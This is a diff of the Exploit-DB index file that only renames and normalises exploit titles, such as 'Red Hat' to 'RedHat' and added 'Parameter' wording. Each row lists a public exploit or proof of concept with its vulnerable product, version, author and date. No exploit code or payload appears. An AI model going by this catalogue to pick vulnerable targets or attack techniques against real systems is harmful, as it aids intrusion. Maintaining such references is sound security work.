29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0 @@ -8272,7 +8272,7 @@ id,file,description,date,author,platform,type,port 36296,platforms/bsd/local/36296.pl,"OpenPAM - 'pam_start()' Privilege Escalation",2011-11-09,IKCE,bsd,local,0 36310,platforms/lin_x86-64/local/36310.txt,"Linux Kernel (x86-64) - Rowhammer Privilege Escalation (PoC)",2015-03-09,"Google Security Research",lin_x86-64,local,0 36311,platforms/lin_x86-64/local/36311.txt,"Rowhammer - NaCl Sandbox Escape (PoC)",2015-03-09,"Google Security Research",lin_x86-64,local,0 -36327,platforms/windows/local/36327.txt,"Microsoft Windows XP/7 - Kernel 'win32k.sys' Keyboard Layout Privilege Escalation",2011-11-22,instruder,windows,local,0 +36327,platforms/windows/local/36327.txt,"Microsoft Windows XP/7 Kernel - 'win32k.sys' Keyboard Layout Privilege Escalation",2011-11-22,instruder,windows,local,0 36388,platforms/linux/local/36388.py,"Brasero CD/DVD Burner 3.4.1 - 'm3u' Buffer Overflow Crash (PoC)",2015-03-16,"Avinash Thapa",linux,local,0 36390,platforms/windows/local/36390.txt,"Foxit Reader 7.0.6.1126 - Unquoted Service Path Elevation Of Privilege",2015-03-16,LiquidWorm,windows,local,0 36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0 @@ -8489,7 +8489,7 @@ id,file,description,date,author,platform,type,port 39628,platforms/linux/local/39628.txt,"FireEye - Malware Input Processor (uid=mip) Privilege Escalation",2016-03-28,"Google Security Research",linux,local,0 39630,platforms/windows/local/39630.g,"Cogent Datahub 7.3.9 Gamma Script - Elevation of Privilege",2016-03-28,mr_me,windows,local,0 39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0 -39666,platforms/windows/local/39666.txt,"Microsoft Windows - Kernel 'win32k.sys' Privilege Escalation (MS14-058)",2016-04-05,"MWR InfoSecurity",windows,local,0 +39666,platforms/windows/local/39666.txt,"Microsoft Windows Kernel - 'win32k.sys' Privilege Escalation (MS14-058)",2016-04-05,"MWR InfoSecurity",windows,local,0 39670,platforms/windows/local/39670.txt,"Panda Security URL Filtering < 4.3.1.9 - Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local,0 39671,platforms/windows/local/39671.txt,"Panda Endpoint Administration Agent < 7.50.00 - Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local,0 39673,platforms/linux/local/39673.py,"Mess Emulator 0.154-3.1 - Local Buffer Overflow",2016-04-07,"Juan Sacco",linux,local,0 @@ -8625,13 +8625,13 @@ id,file,description,date,author,platform,type,port 40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - SEH Local Buffer Overflow",2016-10-25,n30m1nd,windows,local,0 40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0 40636,platforms/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,windows,local,0 -40653,platforms/osx/local/40653.txt,"Apple OS X/iOS - Kernel IOSurface Use-After-Free",2016-10-31,"Google Security Research",osx,local,0 +40653,platforms/osx/local/40653.txt,"Apple OS X/iOS Kernel - IOSurface Use-After-Free",2016-10-31,"Google Security Research",osx,local,0 40655,platforms/windows/local/40655.txt,"NVIDIA Driver - UVMLiteController ioctl Handling Unchecked Input/Output Lengths Privilege Escalation",2016-10-31,"Google Security Research",windows,local,0 40660,platforms/windows/local/40660.txt,"NVIDIA Driver - NvStreamKms Stack Buffer Overflow in PsSetCreateProcessNotifyRoutineEx Callback Privilege Escalation",2016-10-31,"Google Security Research",windows,local,0 40669,platforms/macos/local/40669.txt,"Apple macOS 10.12 - 'task_t' Privilege Escalation",2016-10-31,"Google Security Research",macos,local,0 40678,platforms/linux/local/40678.c,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",linux,local,0 40686,platforms/multiple/local/40686.txt,"Citrix Receiver/Receiver Desktop Lock 4.5 - Authentication Bypass",2016-11-02,"Rithwik Jayasimha",multiple,local,0 -40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / Redhat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0 +40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0 40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0 40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0 40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0 @@ -9551,7 +9551,7 @@ id,file,description,date,author,platform,type,port 5205,platforms/windows/remote/5205.html,"Symantec BackupExec Calendar Control - 'PVCalendar.ocx' Buffer Overflow",2008-02-29,Elazar,windows,remote,0 5212,platforms/windows/remote/5212.py,"MiniWebsvr 0.0.9a - Remote Directory Traversal",2008-03-03,gbr,windows,remote,0 5213,platforms/windows/remote/5213.txt,"Versant Object Database 7.0.1.3 - Commands Execution",2008-03-04,"Luigi Auriemma",windows,remote,0 -5215,platforms/multiple/remote/5215.txt,"Ruby 1.8.6 - (Webrick Httpd 1.3.1) Directory Traversal",2008-03-06,DSecRG,multiple,remote,0 +5215,platforms/multiple/remote/5215.txt,"Ruby 1.8.6/1.9 (WEBick Httpd 1.3.1) - Directory Traversal",2008-03-06,DSecRG,multiple,remote,0 5224,platforms/linux/remote/5224.php,"VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Root Exploit",2008-03-09,DarkFig,linux,remote,0 5228,platforms/windows/remote/5228.txt,"acronis pxe server 2.0.0.1076 - Directory Traversal / Null Pointer",2008-03-10,"Luigi Auriemma",windows,remote,0 5230,platforms/windows/remote/5230.txt,"argon client management services 1.31 - Directory Traversal",2008-03-10,"Luigi Auriemma",windows,remote,0 @@ -9561,10 +9561,10 @@ id,file,description,date,author,platform,type,port 5257,platforms/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure",2008-03-14,kingcope,multiple,remote,0 5259,platforms/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Authenticated Remote LIST Universal Exploit",2008-03-14,ryujin,windows,remote,143 5264,platforms/windows/remote/5264.html,"CA BrightStor ARCserve Backup r11.5 - ActiveX Remote Buffer Overflow",2008-03-16,h07,windows,remote,0 -5269,platforms/windows/remote/5269.txt,"mg-soft net Inspector 6.5.0.828 - Multiple Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0 +5269,platforms/windows/remote/5269.txt,"MG-SOFT Net Inspector 6.5.0.828 - Multiple Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0 5282,platforms/solaris/remote/5282.txt,"Sun Solaris 10 - rpc.ypupdated Remote Root Exploit",2008-03-20,kingcope,solaris,remote,0 5283,platforms/linux/remote/5283.txt,"CenterIM 4.22.3 - Remote Command Execution",2008-03-20,"Brian Fonfara",linux,remote,0 -5289,platforms/hardware/remote/5289.txt,"ZYXEL ZyWALL Quagga/Zebra - (Default Password) Remote Root Exploit",2008-03-21,"Pranav Joshi",hardware,remote,0 +5289,platforms/hardware/remote/5289.txt,"ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Root Exploit",2008-03-21,"Pranav Joshi",hardware,remote,0 5313,platforms/hardware/remote/5313.txt,"Linksys WRT54G (Firmware 1.00.9) - Security Bypass Vulnerabilities (1)",2008-03-26,meathive,hardware,remote,0 5314,platforms/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow",2008-03-26,muts,windows,remote,69 5315,platforms/windows/remote/5315.py,"Quick TFTP Server Pro 2.1 - Remote SEH Overflow",2008-03-26,muts,windows,remote,69 @@ -11974,7 +11974,7 @@ id,file,description,date,author,platform,type,port 21104,platforms/cgi/remote/21104.pl,"Hassan Consulting Shopping Cart 1.23 - Arbitrary Command Execution",2001-09-08,"Alexey Sintsov",cgi,remote,0 21109,platforms/windows/remote/21109.c,"EFTP 2.0.7 337 - Buffer Overflow Code Execution / Denial of Service",2001-09-12,byterage,windows,remote,0 21110,platforms/windows/remote/21110.pl,"EFTP Server 2.0.7.337 - Directory and File Existence",2001-09-12,byterage,windows,remote,0 -21112,platforms/linux/remote/21112.php,"Red Hat Linux 7.0 Apache - Remote 'Username' Enumeration",2001-09-12,"Gabriel A Maggiotti",linux,remote,0 +21112,platforms/linux/remote/21112.php,"RedHat Linux 7.0 Apache - Remote 'Username' Enumeration",2001-09-12,"Gabriel A Maggiotti",linux,remote,0 21113,platforms/windows/remote/21113.txt,"Microsoft Index Server 2.0 - File Information / Full Path Disclosure",2001-09-14,"Syed Mohamed",windows,remote,0 21115,platforms/multiple/remote/21115.pl,"AmTote Homebet - World Accessible Log",2001-09-28,"Gary O'Leary-Steele",multiple,remote,0 21116,platforms/multiple/remote/21116.pl,"Amtote Homebet - Account Information Brute Force",2001-09-28,"Gary O'Leary-Steele",multiple,remote,0 @@ -12198,7 +12198,7 @@ id,file,description,date,author,platform,type,port 21699,platforms/hardware/remote/21699.txt,"Orinoco OEM Residential Gateway - SNMP Community String Remote Configuration",2002-08-09,"Foundstone Inc.",hardware,remote,0 21704,platforms/unix/remote/21704.txt,"W3C CERN httpd 3.0 Proxy - Cross-Site Scripting",2002-08-12,"TAKAGI Hiromitsu",unix,remote,0 21705,platforms/windows/remote/21705.txt,"Microsoft Internet Explorer 6 - File Attachment Script Execution",2002-08-13,http-equiv,windows,remote,0 -21706,platforms/linux/remote/21706.txt,"Red Hat Interchange 4.8.x - Arbitrary File Read",2002-08-13,anonymous,linux,remote,0 +21706,platforms/linux/remote/21706.txt,"RedHat Interchange 4.8.x - Arbitrary File Read",2002-08-13,anonymous,linux,remote,0 21707,platforms/windows/remote/21707.txt,"GoAhead WebServer 2.1 - Arbitrary Command Execution",2002-08-14,anonymous,windows,remote,0 21709,platforms/windows/remote/21709.pl,"MyWebServer 1.0.2 - Search Request Remote Buffer Overflow",2002-08-14,D4rkGr3y,windows,remote,0 21710,platforms/windows/remote/21710.txt,"MyWebServer 1.0.2 - Long HTTP Request HTML Injection",2002-08-14,D4rkGr3y,windows,remote,0 @@ -12644,7 +12644,7 @@ id,file,description,date,author,platform,type,port 23290,platforms/windows/remote/23290.rb,"HP Data Protector - DtbClsLogin Buffer Overflow (Metasploit)",2012-12-11,Metasploit,windows,remote,0 23291,platforms/multiple/remote/23291.txt,"Opera Web Browser 7 - IFRAME Zone Restriction Bypass",2003-10-24,Mindwarper,multiple,remote,0 23295,platforms/linux/remote/23295.txt,"SH-HTTPD 0.3/0.4 - Character Filtering Remote Information Disclosure",2003-10-27,"dong-h0un U",linux,remote,0 -23296,platforms/linux/remote/23296.txt,"Red Hat Apache 2.0.40 - Directory Index Default Configuration Error",2003-10-27,TfM,linux,remote,0 +23296,platforms/linux/remote/23296.txt,"RedHat Apache 2.0.40 - Directory Index Default Configuration Error",2003-10-27,TfM,linux,remote,0 23298,platforms/windows/remote/23298.txt,"Macromedia Flash Player 6.0.x - Flash Cookie Predictable File Location",2003-10-24,Mindwarper,windows,remote,0 23304,platforms/cgi/remote/23304.txt,"Symantec Norton Internet Security 2003 6.0.4.34 - Error Message Cross-Site Scripting",2003-10-27,KrazySnake,cgi,remote,0 23306,platforms/linux/remote/23306.c,"thttpd 2.2x - defang Remote Buffer Overflow (2)",2003-10-27,d3ck4,linux,remote,0 @@ -13309,7 +13309,7 @@ id,file,description,date,author,platform,type,port 27024,platforms/windows/remote/27024.txt,"EFileGo 3.0 - Multiple Input Validation Vulnerabilities",2006-01-03,dr_insane,windows,remote,0 27032,platforms/linux/remote/27032.txt,"Hylafax 4.1/4.2 - Multiple Scripts Remote Command Execution",2006-01-05,"Patrice Fournier",linux,remote,0 27044,platforms/hardware/remote/27044.rb,"D-Link Devices - UPnP SOAP Command Execution (Metasploit)",2013-07-23,Metasploit,hardware,remote,0 -27045,platforms/linux/remote/27045.rb,"Foreman (Red Hat OpenStack/Satellite) - bookmarks/create Code Injection (Metasploit)",2013-07-23,Metasploit,linux,remote,443 +27045,platforms/linux/remote/27045.rb,"Foreman (RedHat OpenStack/Satellite) - bookmarks/create Code Injection (Metasploit)",2013-07-23,Metasploit,linux,remote,443 27046,platforms/windows/remote/27046.rb,"VMware vCenter - Chargeback Manager ImageUploadServlet Arbitrary File Upload (Metasploit)",2013-07-23,Metasploit,windows,remote,443 27072,platforms/windows/remote/27072.pl,"Microsoft Visual Studio - UserControl Remote Code Execution (1)",2006-01-12,anonymous,windows,remote,0 27073,platforms/windows/remote/27073.txt,"Microsoft Visual Studio - UserControl Remote Code Execution (2)",2006-01-12,priestmaster,windows,remote,0 @@ -13619,7 +13619,7 @@ id,file,description,date,author,platform,type,port 29897,platforms/windows/remote/29897.txt,"Progress 3.1 - Webspeed _CPYFile.P Unauthorized Access",2007-04-24,suresync,windows,remote,0 29930,platforms/multiple/remote/29930.txt,"Apache AXIS 1.0 - Non-Existent WSDL Path Information Disclosure",2007-04-27,jericho+bblog@attrition.org,multiple,remote,0 29931,platforms/multiple/remote/29931.txt,"ManageEngine Password Manager Pro Build 5401 - Database Remote Unauthorized Access",2007-04-27,anonymous,multiple,remote,0 -29932,platforms/linux/remote/29932.txt,"Red Hat Directory Server 7.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-04-30,"Kaushal Desai",linux,remote,0 +29932,platforms/linux/remote/29932.txt,"RedHat Directory Server 7.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-04-30,"Kaushal Desai",linux,remote,0 29945,platforms/hardware/remote/29945.txt,"D-Link DSL-G624T - Var:RelaodHref Cross-Site Scripting",2007-05-03,"Tim Brown",hardware,remote,0 29951,platforms/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 - Cross-Site Scripting",2007-05-04,Solarius,windows,remote,0 29964,platforms/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 - SpntSvc.exe Remote Stack Based Buffer Overflow",2007-05-07,MC,windows,remote,0 @@ -13662,7 +13662,7 @@ id,file,description,date,author,platform,type,port 30319,platforms/linux/remote/30319.c,"tcpdump - Print-bgp.C Remote Integer Underflow",2007-03-01,mu-b,linux,remote,0 30322,platforms/windows/remote/30322.rb,"Lighttpd 1.4.15 - Multiple Code Execution / Denial of Service / Information Disclosure Vulnerabilities",2007-04-16,"Abhisek Datta",windows,remote,0 30381,platforms/windows/remote/30381.txt,"Multiple Browsers - URI Handlers Command Injection Vulnerabilities",2007-07-25,"Billy Rios",windows,remote,0 -30469,platforms/linux/remote/30469.rb,"Red Hat CloudForms Management Engine 5.1 - agent/linuxpkgs Directory Traversal (Metasploit)",2013-12-24,Metasploit,linux,remote,443 +30469,platforms/linux/remote/30469.rb,"RedHat CloudForms Management Engine 5.1 - agent/linuxpkgs Directory Traversal (Metasploit)",2013-12-24,Metasploit,linux,remote,443 31465,platforms/windows/remote/31465.cs,"DotNetNuke 4.8.1 - Default 'ValidationKey' and 'DecriptionKey' Weak Encryption",2008-03-21,"Brian Holyfield",windows,remote,0 30431,platforms/windows/remote/30431.html,"Baidu Soba Search Bar 5.4 - 'BaiduBar.dll' ActiveX Control Remote Code Execution",2007-07-29,cocoruder,windows,remote,0 30432,platforms/novell/remote/30432.txt,"Novell Groupwise 6.5 Webaccess - User.Id Parameter Cross-Site Scripting",2007-07-30,0x000000,novell,remote,0 @@ -13961,7 +13961,7 @@ id,file,description,date,author,platform,type,port 32489,platforms/windows/remote/32489.txt,"Microsoft Outlook Web Access for Exchange Server 2003 - 'redir.asp' URI redirection",2008-10-15,"Martin Suess",windows,remote,0 32491,platforms/windows/remote/32491.html,"Hummingbird HostExplorer 6.2/8.0 - ActiveX Control 'PlainTextPassword()' Buffer Overflow",2008-10-16,"Thomas Pollet",windows,remote,0 32493,platforms/windows/remote/32493.html,"Hummingbird Deployment Wizard 10 - 'DeployRun.dll' ActiveX Control Multiple Security Vulnerabilities",2008-10-17,shinnai,windows,remote,0 -32515,platforms/linux/remote/32515.rb,"Katello (Red Hat Satellite) - users/update_roles Missing Authorisation (Metasploit)",2014-03-26,Metasploit,linux,remote,443 +32515,platforms/linux/remote/32515.rb,"Katello (RedHat Satellite) - users/update_roles Missing Authorisation (Metasploit)",2014-03-26,Metasploit,linux,remote,443 32517,platforms/windows/remote/32517.html,"Mozilla Firefox 3 - 'ftp://' URL Multiple File Format Handling Cross-Site Scripting",2008-10-21,"Muris Kurgas",windows,remote,0 32518,platforms/windows/remote/32518.html,"Google Chrome 0.2.149 - 'ftp://' URL Multiple File Format Handling Cross-Site Scripting",2008-10-21,"Muris Kurgas",windows,remote,0 32529,platforms/multiple/remote/32529.java,"Sun Java Web Start 1.0/1.2 - Remote Command Execution",2008-10-25,"Varun Srivastava",multiple,remote,0 @@ -14031,7 +14031,7 @@ id,file,description,date,author,platform,type,port 32922,platforms/multiple/remote/32922.html,"Apache Geronimo 2.1.x - Cross-Site Request Forgery (Multiple Admin Function)",2009-04-16,DSecRG,multiple,remote,0 32923,platforms/windows/remote/32923.cs,"MiniWeb 0.8.19 - Remote Buffer Overflow",2009-04-16,e.wiZz!,windows,remote,0 32925,platforms/multiple/remote/32925.txt,"NRPE 2.15 - Remote Command Execution",2014-04-18,"Dawid Golunski",multiple,remote,0 -32929,platforms/linux/remote/32929.txt,"Red Hat Stronghold Web Server 2.3 - Cross-Site Scripting",2009-04-20,"Xia Shing Zee",linux,remote,0 +32929,platforms/linux/remote/32929.txt,"RedHat Stronghold Web Server 2.3 - Cross-Site Scripting",2009-04-20,"Xia Shing Zee",linux,remote,0 32931,platforms/hardware/remote/32931.html,"Linksys WRT54GC 1.5.7 - (Firmware) 'administration.cgi' Access Validation",2009-04-20,"Gabriel Lima",hardware,remote,0 32938,platforms/hardware/remote/32938.c,"Sercomm TCP/32674 - Backdoor Reactivation",2014-04-18,Synacktiv,hardware,remote,32674 32942,platforms/linux/remote/32942.txt,"Mozilla - Multiple Products Server Refresh Header Cross-Site Scripting",2009-04-22,"Olli Pettay",linux,remote,0 @@ -14901,7 +14901,7 @@ id,file,description,date,author,platform,type,port 38912,platforms/windows/remote/38912.txt,"Microsoft Windows Media Center - '.Link' File Incorrectly Resolved Reference",2015-12-09,"Core Security",windows,remote,0 38918,platforms/windows/remote/38918.txt,"Microsoft Office / COM Object - 'els.dll' DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote,0 38923,platforms/windows/remote/38923.txt,"Apple Safari For Windows - PhishingAlert Security Bypass",2013-12-07,Jackmasa,windows,remote,0 -39097,platforms/linux/remote/39097.txt,"Red Hat Piranha - Remote Security Bypass",2013-12-11,"Andreas Schiermeier",linux,remote,0 +39097,platforms/linux/remote/39097.txt,"RedHat Piranha - Remote Security Bypass",2013-12-11,"Andreas Schiermeier",linux,remote,0 38964,platforms/hardware/remote/38964.rb,"Siemens Simatic S7 1200 - CPU Command Module (Metasploit)",2015-12-14,"Nguyen Manh Hung",hardware,remote,102 38968,platforms/windows/remote/38968.txt,"Microsoft Office / COM Object - DLL Planting with 'comsvcs.dll' Delay Load of 'mqrt.dll' (MS15-132)",2015-12-14,"Google Security Research",windows,remote,0 38973,platforms/multiple/remote/38973.rb,"Legend Perl IRC Bot - Remote Code Execution (Metasploit)",2015-12-14,Metasploit,multiple,remote,0 @@ -16938,7 +16938,7 @@ id,file,description,date,author,platform,type,port 2975,platforms/php/webapps/2975.pl,"Ixprim CMS 1.2 - Blind SQL Injection",2006-12-21,DarkFig,php,webapps,0 2976,platforms/php/webapps/2976.txt,"inertianews 0.02b - (inertianews_main.php) Remote File Inclusion",2006-12-21,bd0rk,php,webapps,0 2977,platforms/php/webapps/2977.txt,"MKPortal M1.1.1 - 'Urlobox' Cross-Site Request Forgery",2006-12-21,Demential,php,webapps,0 -2979,platforms/php/webapps/2979.txt,"KISGB 5.1.1 - (Authenticate.php) Remote File Inclusion",2006-12-22,mdx,php,webapps,0 +2979,platforms/php/webapps/2979.txt,"KISGB 5.1.1 - 'Authenticate.php' Remote File Inclusion",2006-12-22,mdx,php,webapps,0 2980,platforms/php/webapps/2980.txt,"EternalMart Guestbook 1.10 - (admin/auth.php) Remote File Inclusion",2006-12-22,mdx,php,webapps,0 2981,platforms/php/webapps/2981.php,"open NewsLetter 2.5 - Multiple Vulnerabilities (2)",2006-12-23,BlackHawk,php,webapps,0 2982,platforms/php/webapps/2982.txt,"3editor CMS 0.42 - 'index.php' Local File Inclusion",2006-12-22,3l3ctric-Cracker,php,webapps,0 @@ -17031,7 +17031,7 @@ id,file,description,date,author,platform,type,port 3106,platforms/php/webapps/3106.txt,"uniForum 4 - 'wbsearch.aspx' SQL Injection",2007-01-09,ajann,php,webapps,0 3108,platforms/php/webapps/3108.pl,"Axiom Photo/News Gallery 0.8.6 - Remote File Inclusion",2007-01-09,DeltahackingTEAM,php,webapps,0 3109,platforms/php/webapps/3109.php,"WordPress 2.0.6 - 'wp-trackback.php' SQL Injection",2007-01-10,rgod,php,webapps,0 -3113,platforms/php/webapps/3113.txt,"Jshop Server 1.3 - (fieldValidation.php) Remote File Inclusion",2007-01-10,irvian,php,webapps,0 +3113,platforms/php/webapps/3113.txt,"Jshop Server 1.3 - 'fieldValidation.php' Remote File Inclusion",2007-01-10,irvian,php,webapps,0 3114,platforms/php/webapps/3114.txt,"Article System 0.1 - (INCLUDE_DIR) Remote File Inclusion",2007-01-11,3l3ctric-Cracker,php,webapps,0 3115,platforms/asp/webapps/3115.txt,"vp-asp shopping cart 6.09 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2007-01-11,ajann,asp,webapps,0 3116,platforms/php/webapps/3116.php,"sNews 1.5.30 - Remote Reset Admin Pass / Command Execution",2007-01-12,rgod,php,webapps,0 @@ -17053,7 +17053,7 @@ id,file,description,date,author,platform,type,port 3147,platforms/php/webapps/3147.txt,"Uberghey 0.3.1 - (FrontPage.php) Remote File Inclusion",2007-01-17,GoLd_M,php,webapps,0 3150,platforms/php/webapps/3150.txt,"Oreon 1.2.3 RC4 - (lang/index.php) Remote File Inclusion",2007-01-17,3l3ctric-Cracker,php,webapps,0 3152,platforms/php/webapps/3152.txt,"ComVironment 4.0 - (grab_globals.lib.php) Remote File Inclusion",2007-01-18,GoLd_M,php,webapps,0 -3153,platforms/php/webapps/3153.php,"phpBP RC3 - (2.204) (SQL Injection / cmd) Remote Code Execution",2007-01-18,Kacper,php,webapps,0 +3153,platforms/php/webapps/3153.php,"phpBP RC3 (2.204) - SQL Injection / Remote Code Execution",2007-01-18,Kacper,php,webapps,0 3161,platforms/php/webapps/3161.txt,"PHPSherpa - (include/config.inc.php) Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 3162,platforms/php/webapps/3162.txt,"Bradabra 2.0.5 - (include/includes.php) Remote File Inclusion",2007-01-20,GoLd_M,php,webapps,0 3163,platforms/php/webapps/3163.txt,"Neon Labs Website 3.2 - (nl.php g_strRootDir) Remote File Inclusion",2007-01-20,3l3ctric-Cracker,php,webapps,0 @@ -18390,66 +18390,66 @@ id,file,description,date,author,platform,type,port 5245,platforms/php/webapps/5245.txt,"XOOPS Module tutorials 2.1b - 'printpage.php' SQL Injection",2008-03-12,S@BUN,php,webapps,0 5246,platforms/php/webapps/5246.txt,"EasyCalendar 4.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 5247,platforms/php/webapps/5247.txt,"EasyGallery 5.0tr - Multiple Vulnerabilities",2008-03-12,JosS,php,webapps,0 -5252,platforms/php/webapps/5252.txt,"eXV2 Module MyAnnonces - (lid) SQL Injection",2008-03-14,S@BUN,php,webapps,0 -5253,platforms/php/webapps/5253.txt,"eXV2 Module eblog 1.2 - (blog_id) SQL Injection",2008-03-14,S@BUN,php,webapps,0 -5254,platforms/php/webapps/5254.txt,"eXV2 Module Viso 2.0.4.3 - (kid) SQL Injection",2008-03-14,S@BUN,php,webapps,0 -5255,platforms/php/webapps/5255.txt,"eXV2 Module WebChat 1.60 - (roomid) SQL Injection",2008-03-14,S@BUN,php,webapps,0 +5252,platforms/php/webapps/5252.txt,"eXV2 Module MyAnnonces - 'lid' Parameter SQL Injection",2008-03-14,S@BUN,php,webapps,0 +5253,platforms/php/webapps/5253.txt,"eXV2 Module eblog 1.2 - 'blog_id' Parameter SQL Injection",2008-03-14,S@BUN,php,webapps,0 +5254,platforms/php/webapps/5254.txt,"eXV2 Module Viso 2.0.4.3 - 'kid' Parameter SQL Injection",2008-03-14,S@BUN,php,webapps,0 +5255,platforms/php/webapps/5255.txt,"eXV2 Module WebChat 1.60 - 'roomid' Parameter SQL Injection",2008-03-14,S@BUN,php,webapps,0 5256,platforms/php/webapps/5256.pl,"AuraCMS 2.2.1 - 'X-Forwarded-For' HTTP Header Blind SQL Injection",2008-03-14,NTOS-Team,php,webapps,0 -5260,platforms/php/webapps/5260.txt,"Fuzzylime CMS 3.01 - (admindir) Remote File Inclusion",2008-03-14,irk4z,php,webapps,0 +5260,platforms/php/webapps/5260.txt,"Fuzzylime CMS 3.01 - 'admindir' Parameter Remote File Inclusion",2008-03-14,irk4z,php,webapps,0 5262,platforms/php/webapps/5262.txt,"mutiple timesheets 5.0 - Multiple Vulnerabilities",2008-03-16,JosS,php,webapps,0 5263,platforms/php/webapps/5263.txt,"phpBP RC3 (2.204) FIX4 - SQL Injection",2008-03-16,irk4z,php,webapps,0 -5265,platforms/php/webapps/5265.txt,"Exero CMS 1.0.1 - (theme) Multiple Local File Inclusion",2008-03-17,GoLd_M,php,webapps,0 +5265,platforms/php/webapps/5265.txt,"Exero CMS 1.0.1 - 'theme' Parameter Multiple Local File Inclusion",2008-03-17,GoLd_M,php,webapps,0 5266,platforms/php/webapps/5266.txt,"phpAuction GPL Enhanced 2.51 - Multiple Remote File Inclusion",2008-03-17,RoMaNcYxHaCkEr,php,webapps,0 5267,platforms/php/webapps/5267.txt,"XOOPS Module Dictionary 0.94 - SQL Injection",2008-03-17,S@BUN,php,webapps,0 -5273,platforms/php/webapps/5273.txt,"Joomla! Component Acajoom (com_acajoom) - SQL Injection",2008-03-18,fataku,php,webapps,0 +5273,platforms/php/webapps/5273.txt,"Joomla! Component Acajoom 1.1.5 - SQL Injection",2008-03-18,fataku,php,webapps,0 5274,platforms/asp/webapps/5274.txt,"KAPhotoservice - 'album.asp' SQL Injection",2008-03-18,JosS,asp,webapps,0 5275,platforms/php/webapps/5275.txt,"Easy-Clanpage 2.2 - 'id' SQL Injection",2008-03-18,n3w7u,php,webapps,0 -5276,platforms/asp/webapps/5276.txt,"ASPapp Knowledge Base - 'links.asp CatId' SQL Injection",2008-03-19,xcorpitx,asp,webapps,0 -5277,platforms/php/webapps/5277.txt,"Joomla! Component joovideo 1.2.2 - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 -5278,platforms/php/webapps/5278.txt,"Joomla! Component Alberghi 2.1.3 - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 -5279,platforms/php/webapps/5279.txt,"Mambo Component 'com_accombo' 1.x - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 -5280,platforms/php/webapps/5280.txt,"Joomla! Component Restaurante 1.0 - 'id' SQL Injection",2008-03-19,S@BUN,php,webapps,0 -5281,platforms/php/webapps/5281.php,"PEEL CMS - Admin Hash Extraction / Arbitrary File Upload",2008-03-19,"Charles Fol",php,webapps,0 -5285,platforms/php/webapps/5285.txt,"RunCMS Module section - (artid) SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 -5286,platforms/php/webapps/5286.txt,"ASPapp Knowledge Base - SQL Injection",2008-03-20,xcorpitx,php,webapps,0 +5276,platforms/asp/webapps/5276.txt,"ASPapp Knowledge Base - 'CatId' Parameter SQL Injection",2008-03-19,xcorpitx,asp,webapps,0 +5277,platforms/php/webapps/5277.txt,"Joomla! Component joovideo 1.2.2 - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0 +5278,platforms/php/webapps/5278.txt,"Joomla! Component Alberghi 2.1.3 - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0 +5279,platforms/php/webapps/5279.txt,"Mambo Component Accombo 1.x - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0 +5280,platforms/php/webapps/5280.txt,"Joomla! Component Restaurante 1.0 - 'id' Parameter SQL Injection",2008-03-19,S@BUN,php,webapps,0 +5281,platforms/php/webapps/5281.php,"PEEL CMS 3.x - Admin Hash Extraction / Arbitrary File Upload",2008-03-19,"Charles Fol",php,webapps,0 +5285,platforms/php/webapps/5285.txt,"RunCMS Module section - 'artid' Parameter SQL Injection",2008-03-20,Cr@zy_King,php,webapps,0 +5286,platforms/asp/webapps/5286.txt,"ASPapp Knowledge Base - SQL Injection",2008-03-20,xcorpitx,asp,webapps,0 5288,platforms/php/webapps/5288.txt,"phpAddressBook 2.11 - Multiple Local File Inclusion",2008-03-21,0x90,php,webapps,0 -5290,platforms/php/webapps/5290.txt,"RunCMS Module Photo 3.02 - 'cid' SQL Injection",2008-03-21,S@BUN,php,webapps,0 